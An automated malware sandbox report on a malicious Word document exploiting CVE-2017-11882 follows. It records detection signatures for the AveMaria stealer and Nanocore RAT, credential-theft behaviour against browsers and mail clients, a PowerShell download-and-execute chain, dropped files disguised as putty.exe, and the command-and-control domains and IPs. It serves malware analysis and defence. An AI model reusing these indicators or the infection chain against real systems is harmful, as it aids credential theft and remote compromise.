Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected AveMaria stealer
Source: Yara match | File source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
Yara detected Nanocore RAT
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Contains functionality to steal Chrome passwords or cookies
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: \Google\Chrome\User Data\Default\Login Data | 13_2_0040B917
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: \Chromium\User Data\Default\Login Data | 13_2_0040B917
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: \Google\Chrome\User Data\Default\Login Data | 15_2_0040B917
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: \Chromium\User Data\Default\Login Data | 15_2_0040B917
Contains functionality to steal e-mail passwords
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: POP3 Password | 13_2_004099FF
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: SMTP Password | 13_2_004099FF
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: IMAP Password | 13_2_004099FF
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: POP3 Password | 15_2_004099FF
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: SMTP Password | 15_2_004099FF
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: IMAP Password | 15_2_004099FF
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.json
Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
Source: Yara match | File source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AveMaria stealer
Source: Yara match | File source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
Yara detected Nanocore RAT
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: C:\ProgramData\images.exe | Code function: 21_3_04253030 sqlite3_clear_bindings, _memset | 21_3_04253030
Source: C:\ProgramData\images.exe | Code function: 21_3_042550E0 sqlite3_bind_parameter_index | 21_3_042550E0
Source: C:\ProgramData\images.exe | Code function: 21_3_042552D0 sqlite3_transfer_bindings | 21_3_042552D0
Source: C:\ProgramData\images.exe | Code function: 21_3_04254C20 sqlite3_bind_int | 21_3_04254C20

        MITRE ATT&CK Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Windows Management Instrumentation1 | LSASS Driver2 | LSASS Driver2 | Disable or Modify Tools11 | OS Credential Dumping3 | System Time Discovery12 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer33 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Endpoint Denial of Service1
        Default Accounts | Scripting2 | Create Account11 | Access Token Manipulation1 | Deobfuscate/Decode Files or Information1 | Input Capture121 | System Service Discovery1 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Encrypted Channel2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | Native API1 | Windows Service11 | Windows Service11 | Scripting2 | Credentials In Files1 | File and Directory Discovery5 | SMB/Windows Admin Shares | Input Capture121 | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | Shared Modules1 | Scheduled Task/Job1 | Process Injection622 | Obfuscated Files or Information4 | NTDS | System Information Discovery27 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol2 | SIM Card Swap |  | Carrier Billing Fraud
        Cloud Accounts | Exploitation for Client Execution33 | Registry Run Keys / Startup Folder1 | Scheduled Task/Job1 | Software Packing3 | LSA Secrets | Security Software Discovery331 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol122 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Command and Scripting Interpreter11 | Rc.common | Registry Run Keys / Startup Folder1 | Masquerading23 | Cached Domain Credentials | Virtualization/Sandbox Evasion21 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
        External Remote Services | Scheduled Task/Job1 | Startup Items | Startup Items | Modify Registry1 | DCSync | Process Discovery3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
        Drive-by Compromise | Service Execution2 | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion21 | Proc Filesystem | Application Window Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell3 | At (Linux) | At (Linux) | Access Token Manipulation1 | /etc/passwd and /etc/shadow | Remote System Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
        Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection622 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact
        Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Hidden Files and Directories1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols |  |  | Service Stop
        Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Hidden Users2 | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS |  |  | Inhibit System Recovery

        Behavior Graph


        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        Behavior Graph ID: 457815  Sample: NEW PO1100372954 -.doc  Start date: 02/08/2021  Architecture: WINDOWS  Score: 100

        Start (node 2)
          DNS/IP: hhjhtggfr.duckdns.org
          Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 22 other signatures
          Started: WINWORD.EXE (13), drvinst.exe (18), rdpdr.sys (20), 3 other processes (22)

        WINWORD.EXE 305 48 (node 13)
          DNS/IP: hhjhtggfr.duckdns.org 203.159.80.186, ports 49165, 49166, 49167 (LOVESERVERSGB, Netherlands); newhosteeeee.ydns.eu
          Dropped: C:\Users\user\AppData\Local\...\putty[1].exe, PE32; C:\Users\user\AppData\...\abdtfhghgdghgh .ScT, data; C:\Users\user\AppData\Local\...\FLD93F.tmp, 370; C:\Users\user\AppData\Local\...\11DB366A.png, 370
          Signatures: Document exploit detected (creates forbidden files); Suspicious powershell command line found; Tries to download and execute files (via powershell); 2 other signatures
          Started: powershell.exe 7 (24), powershell.exe 7 (28), powershell.exe 12 7 (30), 3 other processes (33)

        powershell.exe 7 (node 24)
          DNS/IP: newhosteeeee.ydns.eu
          Dropped: C:\Users\user\AppData\Roaming\putty.exe, PE32
          Started: putty.exe 1 7 (35)

        powershell.exe 7 (node 28)
          Started: putty.exe 2 (38)

        powershell.exe 12 7 (node 30)
          DNS/IP: newhosteeeee.ydns.eu
          Signatures: Powershell drops PE file

        3 other processes (node 33)
          Signatures: Injects files into Windows application

        putty.exe 1 7 (node 35)
          Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Contains functionality to inject threads in other processes; 2 other signatures
          Started: putty.exe 4 4 (40)

        putty.exe 2 (node 38)
          Signatures: Injects a PE file into a foreign processes
          Started: putty.exe (44), putty.exe (46), putty.exe (48)

        putty.exe 4 4 (node 40)
          Dropped: C:\ProgramData\images.exe, PE32
          Signatures: Increases the number of concurrent connection per server for Internet Explorer; Hides that the sample has been downloaded from the Internet (zone.identifier)
          Started: images.exe (50), cmd.exe (53)

        images.exe (node 50)
          Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
          Started: images.exe (55)

        cmd.exe (node 53)
          Started: reg.exe (60)

        images.exe (node 55)
          DNS/IP: hutyrtit.ydns.eu 203.159.80.165, ports 49169, 80 (LOVESERVERSGB, Netherlands); sdafsdffssffs.ydns.eu
          Dropped: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, PE32; C:\Users\user\AppData\Local\...\microC[1].exe, PE32; C:\Program Files\Microsoft DN1\sqlmap.dll, PE32+; C:\Windows\System32\rfxvmt.dll, PE32+
          Signatures: Hides user accounts; Tries to harvest and steal browser information (history, passwords, etc); Writes to foreign memory regions; 3 other signatures
          Started: iBCrDCK.i.exe (62), cmd.exe (65)

        reg.exe (node 60)
          Signatures: Creates an undocumented autostart registry key

        iBCrDCK.i.exe (node 62)
          Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
          Started: iBCrDCK.i.exe (67), iBCrDCK.i.exe (72)

        iBCrDCK.i.exe (node 67)
          DNS/IP: hhjhtggfr.duckdns.org
          Dropped: C:\Program Files (x86)\...\smtpsvc.exe, PE32; C:\Users\user\AppData\Roaming\...\run.dat, International
          Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        NEW PO1100372954 -.doc | 24% | ReversingLabs | Script.Exploit.CVE-2017-11882

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | 100% | Joe Sandbox ML |
        C:\ProgramData\images.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Roaming\putty.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe | 100% | Joe Sandbox ML |
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 20% | ReversingLabs | ByteCode-MSIL.Backdoor.Remcos
        C:\Program Files\Microsoft DN1\sqlmap.dll | 20% | Metadefender |
